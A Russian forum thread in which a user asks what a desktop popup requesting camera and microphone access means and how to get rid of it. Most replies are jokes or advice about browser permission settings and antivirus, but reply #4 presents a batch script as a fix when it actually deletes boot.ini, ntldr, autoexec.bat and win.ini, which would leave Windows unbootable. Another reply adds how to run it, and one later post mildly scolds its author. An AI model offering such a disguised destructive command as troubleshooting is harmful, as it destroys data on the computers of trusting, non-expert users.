Гость
Статьи
Кто разбирается в …

Кто разбирается в компьютерах, к вам вопрос

Всем привет, кто разбирантся в компьютерных проблемах помогите пожалуйста. Когда появляется заставка на рабочем столе всплывает маленькое окошко по центру там написано: "Доступ к камере и микрофону local запрпшивает доступ к камере и микрофону, если нажать разрешить то вас могут записывать." Что это такое и как от этого избавится? Заранее спасибо.

Мария
9 ответов
Последний — Перейти
Гость
#1

Вас снимает скрытая камера)😁

Мария
#2
Гость

Вас снимает скрытая камера)😁

))) смешно но я серьезно хочу выяснить что это

Гость
#3
Мария

))) смешно но я серьезно хочу выяснить что это

это пиᴈдец

Гость
#4
Мария

Всем привет, кто разбирантся в компьютерных проблемах помогите пожалуйста. Когда появляется заставка на рабочем столе всплывает маленькое окошко по центру там написано: "Доступ к камере и микрофону local запрпшивает доступ к камере и микрофону, если нажать разрешить то вас могут записывать." Что это такое и как от этого избавится? Заранее спасибо.

Откр

Для того чтобы от этого избавиться,нужно открыть блокнот,создать пустой документ,и вставить вот такой код:

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Перезагрузить,и все.

#5

За вами следят, с помощью камеры и микрофона, этим грешит гугл, это самый шпионский браузер. Система должна отслеживать это, давать разрешение на это или нет. Можете в настройках это разрешить или запретить.

Гость
#6
Evgeny59

За вами следят, с помощью камеры и микрофона, этим грешит гугл, это самый шпионский браузер. Система должна отслеживать это, давать разрешение на это или нет. Можете в настройках это разрешить или запретить.

Ну, или на худой конец, поставить нормальный антивир, который сам отслеживает подобные вещи.

Гость
#7

4. Ну вот создаст она этот пустой документ, и что? Ничего не изменится. Это содержимое надо в командную строку вставить, об этом вы не сказали еще

#8

ничего страшного в этом нет

Гость
#2

4, и не стыдно вам??)))

Форум: Развлечения
Всего: 41 107 тем
Новые темы за все время: 32 156 тем
Популярные темы за все время: 15 259 тем